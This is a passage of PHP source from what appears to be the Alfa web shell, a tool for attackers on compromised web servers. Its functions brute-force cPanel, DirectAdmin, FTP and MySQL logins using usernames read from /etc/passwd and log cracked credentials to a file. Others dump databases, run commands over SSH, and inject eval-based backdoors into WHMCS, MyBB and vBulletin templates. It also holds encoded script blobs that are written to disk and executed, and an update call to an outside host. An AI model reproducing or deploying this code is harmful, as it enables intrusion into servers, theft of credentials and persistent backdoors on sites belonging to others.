    $password = $_POST['alfa4'];
    $dbname = $_POST['alfa5'];
    $dfile = $_POST['alfa6'];
    $host = $_POST['alfa7'];
    if (!empty($dbname)) {
        echo __pre();
        $msg = "<center>Check this :  <font color='red'>" . $dfile . "</font></center>";
        if (@mysqli_connect($host, $username, $password, $dbname)) {
            if (strlen(alfaEx("mysqldump")) > 0) {
                alfaEx("mysqldump --single-transaction --host=\"{$host}\" --user=\"{$username}\" --password=\"{$password}\" {$dbname} > '" . addslashes($dfile) . "'");
                echo $msg;
            } else {
                __alert("Error...!");
            }
        } else {
            echo "<center>mysqli_connect : Error!</center>";
        }
    }
    echo "</div>";
    alfafooter();
}
function Alfa_DirectAdmin_Cracker($info)
{
    if (!$info['mysql']) {
        $url = $info['protocol'] . $info['target'] . ':' . $info['port'] . '/CMD_LOGIN';
    } else {
        $url = $info['protocol'] . $info['target'] . '/phpmyadmin';
    }
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERPWD, $info['username'] . ':' . $info['password']);
    if ($info['mysql']) {
        curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
    }
    $result = curl_exec($curl);
    $curl_errno = curl_errno($curl);
    $curl_error = curl_error($curl);
    if ($curl_errno > 0) {
        echo "<font color='red'>Error: {$curl_error}</font><br>";
    } elseif (preg_match('/CMD_FILE_MANAGER|frameset/i', $result)) {
        echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
        $info['target'] = $url;
        CrackerResualt($info);
    }
    curl_close($curl);
}
function Alfa_CP_Cracker($info)
{
    $url = $info['protocol'] . $info['target'] . ':' . $info['port'];
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'] . ":" . $info['password']) . "\n\r"));
    curl_setopt($curl, CURLOPT_URL, $url);
    $result = curl_exec($curl);
    $curl_errno = curl_errno($curl);
    $curl_error = curl_error($curl);
    if ($curl_errno > 0) {
        echo "<font color='red'>Error: {$curl_error}</font><br>";
    } elseif (preg_match('/filemanager/i', $result)) {
        echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
        $info['target'] = $url;
        CrackerResualt($info);
    }
    curl_close($curl);
}
function Alfa_FTP_Cracker($info)
{
    $url = $info['protocol'] . $info['target'];
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_USERPWD, "" . $info['username'] . ":" . $info['password'] . "");
    $result = curl_exec($curl);
    $curl_errno = curl_errno($curl);
    $curl_error = curl_error($curl);
    if ($curl_errno > 0) {
        echo "<font color='red'>Error: {$curl_error}</font><br>";
    } elseif (preg_match('/(\\d+):(\\d+)/i', $result)) {
        echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
        $info['target'] = $url;
        CrackerResualt($info);
    }
    curl_close($curl);
}
function Alfa_Mysql_Cracker($info)
{
    if (@mysqli_connect($info['target'] . ':' . $info['port'], $info['username'], $info['password'])) {
        CrackerResualt($info);
        echo 'UserName: <font color="red">' . $info['username'] . '</font> PassWord: <font color="red">' . $info['password'] . '</font><font color="green">  Login Success....</font><br>';
    }
}
function Alfa_FTPC($info)
{
    if ($con = @ftp_connect($info['target'], $info['port'])) {
        if ($con) {
            $login = @ftp_login($con, $info['username'], $info['password']);
            if ($login) {
                CrackerResualt($info);
            }
        }
    }
    @ftp_close($con);
}
function CrackerResualt($info)
{
    $res = $info['target'] . ' => ' . $info['username'] . ":" . $info['password'] . "\n";
    $c = @fopen($info['fcrack'], 'a+');
    @fwrite($c, $res);
    @fclose($c);
}
function Alfa_Call_Function_Cracker($method, $info)
{
    switch ($method) {
        case 'cp':
            return Alfa_CP_Cracker($info);
        case 'direct':
        case 'phpmyadmin':
            return Alfa_DirectAdmin_Cracker($info);
        case 'ftp':
            return Alfa_FTP_Cracker($info);
        case 'mysql':
            return Alfa_Mysql_Cracker($info);
        case 'mysql':
            return Alfa_FTPC($info);
    }
}
function alfaCrackers()
{
    alfahead();
    AlfaNum(9, 10);
    echo "<div class=\"header\"><center><br><div class=\"txtfont_header\">| Brute Forcer |</div><br><br><form method=\"post\" onsubmit=\"g('Crackers',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,'start',this.protocol.value,this.loginpanel.value);return false;\"><div class=\"txtfont\">Login Page: <select onclick=\"dis_input(this.value);\" name=\"loginpanel\">";
    foreach (array('cp' => 'Cpanel', 'direct' => 'DirectAdmin', 'ftp' => 'FTP', 'phpmyadmin' => 'PhpMyAdmin[DirectAdmin]', 'mysql' => 'mysql_connect()', 'ftpc' => 'ftp_connect()') as $key => $val) {
        echo '<option value="' . $key . '">' . $val . '</option>';
    }
    echo "</select> Protocol: <select id=\"protocol\" name=\"protocol\">";
    foreach (array('https://', 'http://', 'ftp://') as $val) {
        echo '<option value="' . $val . '">' . $val . '</option>';
    }
    echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
Port: <input id="port" type="text" name="port" value="2083">
<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
<textarea placeholder="Users" rows="20" cols="25" name="usernames">' . ($GLOBALS['sys'] == 'unix' ? alfaEx("cut -d: -f1 /etc/passwd") : "") . '</textarea>
&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
    $target = str_replace(array('https://', 'http://', 'ftp://'), '', $_POST['alfa1']);
    $port = $_POST['alfa2'];
    $usernames = $_POST['alfa3'];
    $passwords = $_POST['alfa4'];
    $fcrack = $_POST['alfa5'];
    $cracking = $_POST['alfa6'];
    $protocol = $_POST['alfa7'];
    $loginpanel = $_POST['alfa8'];
    $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
    if ($cracking == 'start') {
        echo __pre();
        $exuser = explode("\n", $usernames);
        $expw = explode("\n", $passwords);
        foreach ($exuser as $user) {
            foreach ($expw as $pw) {
                $array = array('username' => trim($user), 'password' => trim($pw), 'port' => trim($port), 'target' => trim($target), 'protocol' => trim($protocol), 'fcrack' => trim($fcrack), 'mysql' => $p);
                Alfa_Call_Function_Cracker($loginpanel, $array);
            }
        }
        echo "<br><font color=\"red\">Attack Finished...</font>";
    }
    echo "</div>";
    alfafooter();
}
function alfassh2()
{
    if (function_exists('ssh2_connect')) {
        $_SESSION['connected'] = false;
        $ssh_ip = $_POST['alfa1'];
        $ssh_login = $_POST['alfa2'];
        $ssh_pass = $_POST['alfa3'];
        $ssh_port = $_POST['alfa4'];
        $ssh_command = $_POST['alfa5'];
        if ($alfaconnect2ssh = @ssh2_connect($ssh_ip, $ssh_port)) {
            if ($alfalogin = @ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass)) {
                $_SESSION['connected'] = true;
            }
        }
        if ($_SESSION['connected'] !== true) {
            alfahead();
            echo "<div class=header>";
            echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
            alfafooter();
        }
        if ($_SESSION['connected'] == true) {
            alfahead();
            echo "<div class=header>";
            echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"" . $ssh_ip . "\",\"" . $ssh_login . "\",\"" . $ssh_pass . "\",\"" . $ssh_port . "\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\\'ssh2\\',null,\\'\\',\\'\\',\\'\\'); return false;'><input type=submit name='destsession' value='logout'></form>";
            $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
            stream_set_blocking($alfastream, true);
            $output = ssh2_fetch_stream($alfastream, SSH2_STREAM_STDIO);
            if ($_POST['alfa6'] == '>>') {
                echo "<pre class=ml1>";
                ob_start();
                echo stream_get_contents($output);
                echo htmlspecialchars(ob_get_clean());
            }
            echo "</div>";
            alfafooter();
        }
    } else {
        alfahead();
        echo "<div class=header><p><center><b><font color=\"red\">Server does not support SSH2</font><p></b></center></div>";
        alfafooter();
    }
}
function output($string)
{
    echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='" . $string . "'>Click Here !</a></font></b></center><br><br>";
}
function alfaShellInjectors()
{
    alfahead();
    echo "<div class=header>";
    AlfaNum(11);
    echo "<center><p><div class=\"txtfont_header\">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,'whmcs',null)\">| WHMCS | </a><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,null,'mybb')\">| MyBB | </a><a href=javascript:void(0) onclick=\"g('ShellInjectors',null,null,null,'vb')\">| vBulletin |</a></h3></center>";
    $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
    if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'whmcs') {
        AlfaNum();
        echo __pre() . "<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>" . getConfigHtml('whmcs') . "</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'));
        create_table($table);
        echo "<p><div class=\"txtfont\">Shell Inject Method : </div> <select name=\"method\" style=\"width:100px;\"><option value=\"auto\">AutoMatic</option><option value=\"man\">Manuel</option></select></p>";
        echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
        if (isset($_POST['alfa6'])) {
            $dbu = $_POST['alfa6'];
            $dbn = $_POST['alfa7'];
            $dbp = $_POST['alfa8'];
            $dbh = $_POST['alfa9'];
            $path = $_POST['alfa10'];
            $method = $_POST['alfa4'];
            $index = "{php}ALFA_UPLOADER;{/php}";
            $newin = "{php}ALFA_UPLOADER;{/php}";
            $newindex = "<p>Dear {php}ALFA_UPLOADER;{/php},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\\/php}";
            if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) {
                if (filter_var($path, FILTER_VALIDATE_URL)) {
                    $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                    $soleSave = mysqli_query($conn, "select message from tblemailtemplates where name='Password Reset Validation'");
                    $soleGet = mysqli_fetch_assoc($soleSave);
                    $tempSave1 = $soleGet['message'];
                    $tempSave = str_replace("'", "\\'", $tempSave1);
                    $inject = "UPDATE tblemailtemplates SET message='<p>Dear {php}ALFA_UPLOADER;{/php},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\\/php}' WHERE name='Password Reset Validation'";
                    $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
                    $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
                    $result2 = mysqli_query($conn, $create) or die(mysqli_error($conn));
                    if (function_exists('curl_version') && $method == 'auto') {
                        $AlfaSole = new AlfaCURL(true);
                        $saveurl = $AlfaSole->Send($path . "/pwreset.php");
                        $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i", $saveurl, $token);
                        $AlfaSole->Send($path . "/pwreset.php", "post", "token={$token[1]}&action=reset&email=solevisible@fbi.gov");
                        $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
                        $Solevisible = mysqli_query($conn, $backdata) or die(mysqli_error($conn));
                        __alert("shell injectet...");
                        $ff = 'http://' . $path . "/solevisible.php";
                        output($ff);
                    } else {
                        echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='" . $path . "/pwreset.php' target='_blank'>" . $path . "/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $path . "/solevisible.php' target='_blank'>" . $path . "/solevisible.php</a></b></center><br><br>";
                    }
                } else {
                    __alert('Path is not Valid...');
                }
            }
        }
    }
    if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'mybb') {
        AlfaNum(1, 2, 3, 5);
        echo __pre() . "<p><div class='txtfont_header'>| MyBB |</div></p><center><center>" . getConfigHtml("mybb") . "<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>\n";
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => 'mybb_', 'inputSize' => '50'));
        create_table($table);
        echo $selector;
        echo "<p><input type=submit value=' '></p></form></center></center>";
        if (isset($_POST['alfa6'])) {
            $dbu = $_POST['alfa6'];
            $dbn = $_POST['alfa7'];
            $dbp = $_POST['alfa8'];
            $dbh = $_POST['alfa9'];
            $prefix = $_POST['alfa10'];
            $method = $_POST['alfa4'];
            $shellCode = "{\${ALFA_UPLOADER}}";
            $newinshell = "{\${ALFA_UPLOADER}}";
            if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) {
                $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn));
                $inject = "select template from {$prefix}templates where  title= 'calendar'";
                $result = mysqli_query($conn, $inject) or die(mysqli_error($conn));
                $GetTemp = mysqli_fetch_assoc($result);
                $saveDate = $GetTemp['template'];
                $repsave = str_replace($shellCode, "", $saveDate);
                $repsave = str_replace("'", "\\'", $repsave);
                $createShell = "update {$prefix}templates SET template= '" . $newinshell . $repsave . "' where title = 'calendar'";
                $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn));
                $geturl = "select value from {$prefix}settings where name= 'bburl'";
                $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn));
                $rowb = mysqli_fetch_assoc($findurl);
                $furl = $rowb['value'];
                $realurl = parse_url($furl, PHP_URL_HOST);
                $realpath = parse_url($furl, PHP_URL_PATH);
                $res = false;
                $AlfaCurl = new AlfaCURL();
                if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto') {
                    if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) {
                        @fputs($fsock, "GET {$realpath}/calendar.php HTTP/1.1\r\n");
                        @fputs($fsock, "HOST: {$realurl}\r\n");
                        @fputs($fsock, "Connection: close\r\n\r\n");
                        $check = fgets($fsock);
                        if (preg_match("/200 OK/i", $check)) {
                            $repairdbtemp = "update {$prefix}templates SET template= '{$repsave}' where title = 'calendar'";
                            $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn));
                            $res = true;
                        }
                        @fclose($fsock);
                    }
                } elseif (function_exists('curl_version') && $method == 'auto') {
                    $AlfaCurl->Send($realurl . $realpath . "/calendar.php");
                    $res = true;
                }
                if ($res) {
                    $ff = 'http://' . $realurl . $realpath . "/solevisible.php";
                    output($ff);
                } else {
                    $ff = 'http://' . $realurl . $realpath . "/calendar.php";
                    $fff = 'http://' . $realurl . $realpath . "/solevisible.php";
                    echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color='#FFFFFF'>And Go To => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></b></center><br><br>";
                }
            }
        }
    }
    if (isset($_POST['alfa3']) && $_POST['alfa3'] == 'vb') {
        AlfaNum(1, 2, 7, 9, 10);
        echo __pre() . '<p><div class="txtfont_header">| vbulletin |</div></p><p>' . getConfigHtml('vb') . '</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
        $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50'));
        create_table($table);
        echo $selector;
        echo "<p><input type=\"submit\" value=\" \" /></p></form></center>";
        if (isset($_POST['alfa4']) && !empty($_POST['alfa4'])) {
            $method = $_POST['alfa8'];
            $code = "{\${ALFA_UPLOADER}}{\${exit()}}&";
            $conn = @mysqli_connect($_POST['alfa2'], $_POST['alfa4'], $_POST['alfa5'], $_POST['alfa7']) or die(@mysqli_error($conn));
            $rec = "select `template` from " . $_POST['alfa6'] . "template WHERE title ='faq'";
            $recivedata = @mysqli_query($conn, $rec);
            $getd = @mysqli_fetch_assoc($recivedata);
            $savetoass = $getd['template'];
            $code = "{\${ALFA_UPLOADER}}{\${exit()}}&";
            $p = "UPDATE " . $_POST['alfa6'] . "template SET `template`='" . $code . "' WHERE `title`='faq'";
            $ka = @mysqli_query($conn, $p) or die(mysqli_error($conn));
            $geturl = @mysqli_query($conn, "select `value` from " . $_POST['alfa6'] . "setting WHERE `varname`='bburl'");
            $getval = @mysqli_fetch_assoc($geturl);
            $saveval = $getval['value'];
            $realurl = parse_url($saveval, PHP_URL_HOST);
            $realpath = parse_url($saveval, PHP_URL_PATH);
            $res = false;
            $AlfaCurl = new AlfaCURL();
            if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto') {
                if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) {
                    @fputs($fsock, "GET {$realpath}/faq.php HTTP/1.1\r\n");
                    @fputs($fsock, "HOST: {$realurl}\r\n");
                    @fputs($fsock, "Connection: close\r\n\r\n");
                    $check = fgets($fsock);
                    if (preg_match("/200 OK/i", $check)) {
                        $p1 = "UPDATE " . $_POST['alfa6'] . "template SET template ='" . str_replace("'", "\\'", $savetoass) . "' WHERE title ='faq'";
                        $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
                        $res = true;
                    }
                    @fclose($fsock);
                }
            } elseif (function_exists('curl_version') && $method == 'auto') {
                $AlfaCurl->Send($realurl . $realpath . "/faq.php");
                $p1 = "UPDATE " . $_POST['alfa6'] . "template SET template ='" . str_replace("'", "\\'", $savetoass) . "' WHERE title ='faq'";
                $ka1 = @mysqli_query($conn, $p1) or die(mysqli_error($conn));
                $res = true;
            }
            if ($res) {
                $ff = 'http://' . $realurl . $realpath . "/solevisible.php";
                output($ff);
            } else {
                $ff = 'http://' . $realurl . $realpath . "/faq.php";
                $fff = 'http://' . $realurl . $realpath . "/solevisible.php";
                echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='" . $ff . "' target='_blank'>" . $ff . "</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='" . $fff . "' target='_blank'>" . $fff . "</a></center></p>";
            }
        }
    }
    echo "</div>";
    alfafooter();
}
function alfaupdatepath()
{
    if ($_POST['path'] != '') {
        $_SESSION[__LAST_CWD__] = $_POST['path'];
    }
    echo $_SESSION[__LAST_CWD__];
}
function alfacheckfiletype()
{
    $path = $_POST['path'];
    $arg = $_POST['arg'];
    if (@is_file($path . '/' . $arg)) {
        echo "file";
    } else {
        echo "dir";
    }
}
function alfacheckupdate()
{
    if (!isset($_COOKIE['alfa_checkupdate'])) {
        if (function_exists("curl_version")) {
            $update = new AlfaCURL();
            $json = $update->Send("http://solevisible.com/update.json");
            $json = @json_decode($json);
            if ($json) {
                if (__ALFA_VERSION__ != $json->version) {
                    @setcookie("alfa_checkupdate", "1", time() + 86400);
                    echo '<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="' . $json->url . '" target="_blank">' . $json->text . '<br> Version: ' . $json->version . '</a></div></div></div>';
                }
            }
        }
    }
}
function alfaWriteTocgiapi($name, $source)
{
    @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
    @mkdir('alfacgiapi', 0755);
    __write_file("alfacgiapi/" . $name, __get_resource($source));
    @chmod("alfacgiapi/" . $name, 0755);
}
function alfacheckcgi()
{
    if (strlen(alfaEx("id", false, true, true)) > 0) {
        echo "ok";
    } else {
        echo "no";
    }
}
function alfaupdateheader()
{
    if (!isset($_SESSION["updateheader_data"])) {
        $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
        $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
        alfaWriteTocgiapi("getheader.alfa", $bash);
        $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa", false, true, true);
        if (@is_array(@json_decode($data, true))) {
            $_SESSION["updateheader_data"] = $data;
            echo $data;
        }
    } else {
        echo $_SESSION["updateheader_data"];
    }
}
function alfassiShell()
{
    alfahead();
    echo "<div class=header>";
    @mkdir('alfa_shtml', 0755);
    @chdir('alfa_shtml');
    alfacgihtaccess('shtml');
    $code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
